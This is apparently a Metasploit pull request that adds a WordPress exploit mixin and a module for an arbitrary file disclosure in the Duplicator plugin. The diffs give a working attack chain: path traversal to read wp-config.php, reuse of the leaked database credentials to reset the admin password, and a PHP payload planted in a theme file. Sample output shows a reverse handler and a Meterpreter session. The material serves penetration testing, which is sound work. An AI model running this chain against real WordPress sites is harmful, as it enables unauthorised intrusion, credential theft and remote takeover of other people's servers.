### PR TITLE
Adding exploit for WP Duplicator

### DIFF
--- a/lib/msf/core/exploit/mixins.rb
+++ b/lib/msf/core/exploit/mixins.rb
@@ -94,3 +94,4 @@ require 'msf/core/exploit/winrm'
 
 # WebApp
 require 'msf/core/exploit/web'
+require 'msf/core/exploit/wordpress'

--- a/lib/msf/core/exploit/wordpress.rb
+++ b/lib/msf/core/exploit/wordpress.rb
@@ -3,7 +3,7 @@ module Msf
 
 ###
 #
-# This module provides a way of exploiting wordpress installations
+# This module provides a way of interacting with and exploiting wordpress installations
 #
 ###
 require 'rbmysql'
@@ -28,32 +28,32 @@ module Exploit::Remote::Wordpress
 		@admin_token = ''
 	end
 
-	# URIs for different parts of Worpdress
-	def wordpress_uri
-		uri = String.new(target_uri.path)
-		uri << '/' if uri[-1,1] != '/'
-		return uri
+	# Paths for different parts of Worpdress so that we can easily call them
+	def wordpress_path
+		path = String.new(target_uri.path)
+		path << '/' if path[-1,1] != '/'
+		return path
 	end
 
-	def plugins_uri
-		uri = wordpress_uri
-		uri << datastore['PLUGINSPATH']
-		uri << '/' if uri[-1,1] != '/'
-		return uri
+	def plugins_path
+		path = wordpress_path
+		path << datastore['PLUGINSPATH']
+		path << '/' if path[-1,1] != '/'
+		return path
 	end
 
-	def admin_uri
-		uri = wordpress_uri
-		uri << datastore['ADMINPATH']
-		uri << '/' if uri[-1,1] != '/'
-		return uri
+	def admin_path
+		path = wordpress_path
+		path << datastore['ADMINPATH']
+		path << '/' if path[-1,1] != '/'
+		return path
 	end
 
-	def themes_uri
-		uri = wordpress_uri
-		uri << datastore['THEMESPATH']
-		uri << '/' if uri[-1,1] != '/'
-		return uri
+	def themes_path
+		path = wordpress_path
+		path << datastore['THEMESPATH']
+		path << '/' if path[-1,1] != '/'
+		return path
 	end
 
 	def parse_wp_config(body)
@@ -110,10 +110,12 @@ module Exploit::Remote::Wordpress
 			fail_with(Exploit::Failure::BadConfig, 'An admin cookie has not been acquired yet')
 		end
 		res = send_request_cgi({
-			'method' => 'POST',
-			'uri'    => "#{self.admin_uri}theme-editor.php?file=header.php",
+			'method' => 'GET',
+			'uri'    => "#{self.admin_path}theme-editor.php",
 			'cookie' => @admin_cookie,
 		})
+
+		theme, file = res.body.scan(/<a href="theme-editor.php\?.+?theme=(.+?)">(.+?.php)<\/a>/).sample
 
 		if res and res.code != 200
 			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
@@ -121,20 +123,26 @@ module Exploit::Remote::Wordpress
 			fail_with(Exploit::Failure::NotVulnerable, 'Wordpress does not have write access')
 		end
 
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => "#{self.admin_path}theme-editor.php?file=#{file}&theme=#{theme}",
+			'cookie' => @admin_cookie,
+		})
+
 		nonce = res.body.scan(/<input.+?id="_wpnonce".+?value="(.+?)"/)[0][0].to_s
 		old_content = Rex::Text.html_decode(Rex::Text.html_decode(res.body.scan(/<textarea.+?id="newcontent".+?>(.*)<\/textarea>/m)[0][0].to_s))
-		theme = res.body.scan(/<input.+?name="theme".+?value="(.+?)"/)[0][0].to_s
 
-		return [theme, nonce, old_content]
+		return [theme, file, nonce, old_content]
 	end
 
-	def set_wp_theme(nonce, theme, new_content)
+	def set_wp_theme(nonce, theme, file, new_content)
 		if @admin_cookie.empty?
 			fail_with(Exploit::Failure::BadConfig, 'An admin cookie has not been acquired yet')
 		end
+
 		res = send_request_cgi({
 			'method'    => 'POST',
-			'uri'       => "#{self.admin_uri}theme-editor.php?",
+			'uri'       => "#{self.admin_path}theme-editor.php?",
 			'cookie'    => @admin_cookie,
 			'vars_post' =>
 				{
@@ -142,7 +150,7 @@ module Exploit::Remote::Wordpress
 					'theme'      => theme,
 					'newcontent' => new_content,
 					'action'     => 'update',
-					'file'       => 'header.php'
+					'file'       => file,
 				},
 		})
 
@@ -170,14 +178,14 @@ module Exploit::Remote::Wordpress
 		if res.nil? or res.size <= 0
 			fail_with(Exploit::Failure::UnexpectedReply, 'No admin was account found')
 		end
-		
+
 		return res.first
 	end
 
 	def get_wp_cookie(username, password)
 		res = send_request_cgi({
 			'method'     => 'POST',
-			'uri'        => "#{self.wordpress_uri}wp-login.php",
+			'uri'        => "#{self.wordpress_path}wp-login.php",
 			'cookie'     => 'wordpress_test_cookie=WP+Cookie+check',
 			'vars_post'  =>
 				{
@@ -210,25 +218,24 @@ module Exploit::Remote::Wordpress
 		return @admin_cookie
 	end
 
-	# Chaining a lot of actions into a simple way of planting a
-	# backdoor by just having DB access
+	# Chaining a lot of actions into a simple way of planting a backdoor in a theme
 	def get_theme_backdoor
-		theme, nonce, old_content = get_wp_theme()
+		theme, file, nonce, old_content = get_wp_theme()
 
-		print_warning("Editing theme #{theme}")
-		set_wp_theme(nonce, theme, payload.encoded)
+		print_warning("Editing theme #{theme} file #{file}")
+		set_wp_theme(nonce, theme, file, payload.encoded)
 
 		print_status("Calling backdoor")
 		res = send_request_cgi({
 			'method' => 'GET',
-			'uri'    => "#{self.themes_uri}#{theme}/header.php",
+			'uri'    => "#{self.themes_path}#{theme}/#{file}",
 		})
 
 		if res and res.code != 200
 			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
 		end
 
-		set_wp_theme(nonce, theme, old_content)
+		set_wp_theme(nonce, theme, file, old_content)
 	end
 
 end

--- a/lib/msf/core/exploit/wordpress.rb
+++ b/lib/msf/core/exploit/wordpress.rb
@@ -1,0 +1,235 @@
+# -*- coding: binary -*-
+module Msf
+
+###
+#
+# This module provides a way of exploiting wordpress installations
+#
+###
+require 'rbmysql'
+
+module Exploit::Remote::Wordpress
+	include Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+
+	def initialize(info = {})
+		super
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/']),
+				OptString.new('PLUGINSPATH', [true, 'The relative path to the plugins folder', 'wp-content/plugins/']),
+				OptString.new('ADMINPATH', [true, 'The relative path to the admin folder', 'wp-admin/']),
+				OptString.new('THEMESPATH', [true, 'The relative path to the themes folder', 'wp-content/themes/']),
+			], Exploit::Remote::Wordpress
+		)
+
+		@wp_config = {}
+		@admin_token = ''
+	end
+
+	# URIs for different parts of Worpdress
+	def wordpress_uri
+		uri = String.new(target_uri.path)
+		uri << '/' if uri[-1,1] != '/'
+		return uri
+	end
+
+	def plugins_uri
+		uri = wordpress_uri
+		uri << datastore['PLUGINSPATH']
+		uri << '/' if uri[-1,1] != '/'
+		return uri
+	end
+
+	def admin_uri
+		uri = wordpress_uri
+		uri << datastore['ADMINPATH']
+		uri << '/' if uri[-1,1] != '/'
+		return uri
+	end
+
+	def themes_uri
+		uri = wordpress_uri
+		uri << datastore['THEMESPATH']
+		uri << '/' if uri[-1,1] != '/'
+		return uri
+	end
+
+	def parse_wp_config(body)
+		p = store_loot('wordpress.config', 'text/plain', rhost, body, "#{rhost}_wp-config.php")
+		print_status("wp-config.php saved in: #{p}")
+		print_status("Parsing config file")
+
+		body.each_line do |line|
+			if line =~ /define/
+				key_pair = line.scan(/('|")([^'"]*)('|")/)
+				if key_pair.length == 2
+					@wp_config[key_pair[0][1]] = key_pair[1][1]
+				end
+			elsif line =~ /table_prefix/
+				table_prefix = line.scan(/('|")([^'"]*)('|")/)
+				@wp_config['DB_PREFIX'] = table_prefix[0][1]
+			end
+		end
+		#Extract the port from DB_HOST and normalize DB_HOST
+		@wp_config['DB_PORT'] = @wp_config['DB_HOST'].include?(':') ? @wp_config['DB_HOST'].split(':')[1] : 3306
+
+		if @wp_config['DB_HOST'] =~ /(localhost|127.0.0.1)/
+			print_status("DB_HOST config value was a loopback address. Trying to resolve to a proper IP")
+			@wp_config['DB_HOST'] = ::Rex::Socket.getaddress(datastore['RHOST'])
+		end
+
+		return @wp_config
+	end
+
+	def connect_to_wp_database()
+		begin
+			@mysql_handle = ::RbMysql.connect({
+				:host           => @wp_config['DB_HOST'],
+				:port           => @wp_config['DB_PORT'],
+				:read_timeout   => 300,
+				:write_timeout  => 300,
+				:socket         => nil,
+				:user           => @wp_config['DB_USER'],
+				:password       => @wp_config['DB_PASSWORD'],
+				:db             => @wp_config['DB_NAME']
+			})
+		rescue Errno::ECONNREFUSED,
+			RbMysql::ClientError,
+			Errno::ETIMEDOUT,
+			RbMysql::AccessDeniedError,
+			RbMysql::HostNotPrivileged
+			fail_with(Exploit::Failure::NotVulnerable, 'Unable to connect to the MySQL server')
+		end
+	end
+
+	# Theme operations, used for planting PHP payloads
+	def get_wp_theme()
+		if @admin_cookie.empty?
+			fail_with(Exploit::Failure::BadConfig, 'An admin cookie has not been acquired yet')
+		end
+		res = send_request_cgi({
+			'method' => 'POST',
+			'uri'    => "#{self.admin_uri}theme-editor.php?file=header.php",
+			'cookie' => @admin_cookie,
+		})
+
+		if res and res.code != 200
+			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
+		elsif res and res.body.scan(/<input.+?name="submit".+?class="button button-primary"/).length == 0
+			fail_with(Exploit::Failure::NotVulnerable, 'Wordpress does not have write access')
+		end
+
+		nonce = res.body.scan(/<input.+?id="_wpnonce".+?value="(.+?)"/)[0][0].to_s
+		old_content = Rex::Text.html_decode(Rex::Text.html_decode(res.body.scan(/<textarea.+?id="newcontent".+?>(.*)<\/textarea>/m)[0][0].to_s))
+		theme = res.body.scan(/<input.+?name="theme".+?value="(.+?)"/)[0][0].to_s
+
+		return [theme, nonce, old_content]
+	end
+
+	def set_wp_theme(nonce, theme, new_content)
+		if @admin_cookie.empty?
+			fail_with(Exploit::Failure::BadConfig, 'An admin cookie has not been acquired yet')
+		end
+		res = send_request_cgi({
+			'method'    => 'POST',
+			'uri'       => "#{self.admin_uri}theme-editor.php?",
+			'cookie'    => @admin_cookie,
+			'vars_post' =>
+				{
+					'_wpnonce'   => nonce,
+					'theme'      => theme,
+					'newcontent' => new_content,
+					'action'     => 'update',
+					'file'       => 'header.php'
+				},
+		})
+
+		if res and res.code != 302
+			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
+		end
+	end
+
+	# User and authentication operations
+	def set_user_password_hash(user_login, new_password, encode=true)
+		if @mysql_handle == nil
+			fail_with(Exploit::Failure::NoTarget, 'The mysql connection has not been created yet')
+		end
+		@mysql_handle.query("UPDATE #{@wp_config['DB_PREFIX']}users SET user_pass = '#{encode ? ::Rex::Text.md5(new_password) : new_password}' WHERE user_login = '#{user_login}'")
+		print_warning("User password changed to: #{new_password}")
+	end
+
+	def get_admin_user
+		if @mysql_handle == nil
+			fail_with(Exploit::Failure::NoTarget, 'The mysql connection has not been created yet')
+		end
+		res = @mysql_handle.query("SELECT user_login, user_pass FROM #{@wp_config['DB_PREFIX']}users U
+									INNER JOIN #{@wp_config['DB_PREFIX']}usermeta M ON M.user_id = U.ID AND M.meta_key = 'wp_user_level' AND meta_value = '10' LIMIT 1")
+
+		if res.nil? or res.size <= 0
+			fail_with(Exploit::Failure::UnexpectedReply, 'No admin was account found')
+		end
+		
+		return res.first
+	end
+
+	def get_wp_cookie(username, password)
+		res = send_request_cgi({
+			'method'     => 'POST',
+			'uri'        => "#{self.wordpress_uri}wp-login.php",
+			'cookie'     => 'wordpress_test_cookie=WP+Cookie+check',
+			'vars_post'  =>
+				{
+					'log'        => username,
+					'pwd'        => password,
+					'wp-submit'  => 'Log+In',
+					'testcookie' => '1',
+				},
+		})
+
+		if res and res.code == 200
+			fail_with(Exploit::Failure::UnexpectedReply, 'Admin login failed')
+		elsif res and res.code != 302
+			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
+		end
+
+		@admin_cookie = ''
+		(res.headers['Set-Cookie'] || '').split(',').each do |cookie|
+			@admin_cookie << cookie.split(';')[0]
+			@admin_cookie << ';'
+		end
+
+		if @admin_cookie.empty?
+			fail_with(Exploit::Failure::UnexpectedReply, 'The resulting cookie was empty')
+		end
+		if not ['DB_HOST', 'DB_PORT', 'DB_USER', 'DB_PASSWORD', 'DB_NAME'].all? { |parameter| @wp_config.has_key?(parameter) }
+			fail_with(Exploit::Failure::UnexpectedReply, "The config file did not parse properly")
+		end
+
+		return @admin_cookie
+	end
+
+	# Chaining a lot of actions into a simple way of planting a
+	# backdoor by just having DB access
+	def get_theme_backdoor
+		theme, nonce, old_content = get_wp_theme()
+
+		print_warning("Editing theme #{theme}")
+		set_wp_theme(nonce, theme, payload.encoded)
+
+		print_status("Calling backdoor")
+		res = send_request_cgi({
+			'method' => 'GET',
+			'uri'    => "#{self.themes_uri}#{theme}/header.php",
+		})
+
+		if res and res.code != 200
+			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
+		end
+
+		set_wp_theme(nonce, theme, old_content)
+	end
+
+end
+end

--- a/modules/exploits/unix/webapp/wp_duplicator_exec.rb
+++ b/modules/exploits/unix/webapp/wp_duplicator_exec.rb
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		res = send_request_cgi({
 			'method' 	=> 'GET',
-			'uri'    	=> "#{self.plugins_uri}duplicator/inc/actions.php",
+			'uri'    	=> "#{self.plugins_path}duplicator/inc/actions.php",
 		})
 
 		if res and res.code == 200
@@ -66,16 +66,16 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status('Fetching wp-config.php')
 		res = send_request_cgi({
 			'method'     => 'GET',
-			'uri'        => "#{self.plugins_uri}google-document-embedder/libs/pdf.php",
+			'uri'        => "#{self.plugins_path}duplicator/files/installer.rescue.php",
 			'vars_get'   =>
 				{
-					'fn'   => "#{rand_text_alphanumeric(4)}.pdf",
-					'file' => "#{'../' * self.plugins_uri.count('/')}wp-config.php",
+					'file'	=> "./_installer.php/../#{'../' * self.plugins_path.count('/')}wp-config.php",
+					'get'	=> "#{rand_text_alphanumeric(2)}",
 				}
 		})
 
-		if (res and res.body =~ /Unable to read installer file/) or res.code == 404
-			fail_with(Exploit::Failure::NotVulnerable, 'allow_url_fopen and curl are both disabled')
+		if (res and res.body =~ /Unable to read installer file/)
+			fail_with(Exploit::Failure::NotVulnerable, 'readfile and file_get_contents disabled on this server')
 		elsif res.code != 200
 			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
 		end

--- a/modules/exploits/unix/webapp/wp_duplicator_exec.rb
+++ b/modules/exploits/unix/webapp/wp_duplicator_exec.rb
@@ -14,12 +14,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'WordPress Plugin Google Document Embedder Arbitrary File Disclosure',
+			'Name'           => 'WordPress Plugin Duplicator Arbitrary File Disclosure',
 			'Description'    => %q{
 					This module exploits an arbitrary file disclosure flaw in the WordPress
-				blogging software plugin known as Google Document Embedder. The vulnerability allows for
-				database credential disclosure via the /libs/pdf.php script. The Google Document Embedder
-				plug-in versions 2.4.6 and below are vulnerable. This exploit only works when the MySQL
+				blogging software plugin known as Duplicator. The vulnerability allows for
+				database credential disclosure via the /files/installer.rescue.php script. The Duplicator
+				plug-in versions 0.4.1 and below are vulnerable. This exploit only works when the MySQL
 				server is exposed on a accessible IP and Wordpress has filesystem write access.
 
 				Please note: The admin password may get changed if the exploit does not run to the end.
@@ -31,9 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'        => MSF_LICENSE,
 			'References'     =>
 				[
-					['CVE', '2012-4915'],
-					['OSVDB', '88891'],
-					['URL', 'http://secunia.com/advisories/50832'],
+					['URL', 'http://ceriksen.com/2013/01/02/wordpress-duplicator-plugin-arbitrary-file-disclosure/'],
 				],
 			'Privileged'     => false,
 			'Payload'        =>
@@ -47,14 +45,14 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'php',
 			'Arch'           => ARCH_PHP,
 			'Targets'        => [[ 'Automatic', { }]],
-			'DisclosureDate' => 'Jan 03 2013',
+			'DisclosureDate' => 'Jan 02 2013',
 			'DefaultTarget'  => 0))
 	end
 
 	def check
 		res = send_request_cgi({
-			'method' => 'GET',
-			'uri'    => "#{self.plugins_uri}duplicator/files/pdf.php",
+			'method' 	=> 'GET',
+			'uri'    	=> "#{self.plugins_uri}duplicator/inc/actions.php",
 		})
 
 		if res and res.code == 200
@@ -76,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				}
 		})
 
-		if res and res.body =~ /allow_url_fopen/
+		if (res and res.body =~ /Unable to read installer file/) or res.code == 404
 			fail_with(Exploit::Failure::NotVulnerable, 'allow_url_fopen and curl are both disabled')
 		elsif res.code != 200
 			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")

--- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb
+++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		res = send_request_cgi({
 			'method' => 'GET',
-			'uri'    => "#{self.plugins_uri}duplicator/files/pdf.php",
+			'uri'    => "#{self.plugins_path}duplicator/files/pdf.php",
 		})
 
 		if res and res.code == 200
@@ -68,11 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status('Fetching wp-config.php')
 		res = send_request_cgi({
 			'method'     => 'GET',
-			'uri'        => "#{self.plugins_uri}google-document-embedder/libs/pdf.php",
+			'uri'        => "#{self.plugins_path}google-document-embedder/libs/pdf.php",
 			'vars_get'   =>
 				{
 					'fn'   => "#{rand_text_alphanumeric(4)}.pdf",
-					'file' => "#{'../' * self.plugins_uri.count('/')}wp-config.php",
+					'file' => "#{'../' * self.plugins_path.count('/')}wp-config.php",
 				}
 		})
 


### PR DESCRIPTION
This pull request is for adding an exploit for an arbitrary file disclosure in WP Duplicator, 0.4.1(Current version at the time of this PR) and below:
http://wordpress.org/extend/plugins/duplicator/

There's a bit going on in this PR though, mainly:
- I extracted all the logic from wp_google_document_embedder_exec into a wordpress mixin. Now we can exploit Wordpress in more than just a single exploit!
- Reworked wp_google_document_embedder_exec to make use of the mixin
- Reworked a bit of the wordpress logic
- The options are better named(URI vs PATH)
- The theme file that is used for the backdoor is no longer hardcoded to header.php. We now pick a random file, which makes the exploit more reliable
- Added the exploit for the wp_duplicator_exec vuln. 

Expected output is along the lines of:

<pre>
msf  exploit(wp_duplicator_exec) > exploit

[*] Started reverse handler on 192.168.1.103:4444
[*] Fetching wp-config.php
[*] wp-config.php saved in: C:/Users/Charlie/.msf4/loot/20130112154058_default_192.168.1.116_wordpress.config_196193.txt
[*] Parsing config file
[*] DB_HOST config value was a loopback address. Trying to resolve to a proper IP
[!] User password changed to: oOEN7HAZ
[!] Editing theme twentytwelve file content-image.php
[*] Calling backdoor
[*] Sending stage (40384 bytes) to 192.168.1.116
[*] Meterpreter session 2 opened (192.168.1.103:4444 -> 192.168.1.116:49812) at 2013-01-12 15:41:01 +0000
[!] User password changed to: $P$Ba6CA6LqW.SqzLR.y/iu.FT0DytC1f.
[*] Shell should have been acquired. Disabled backdoor

meterpreter >
</pre>
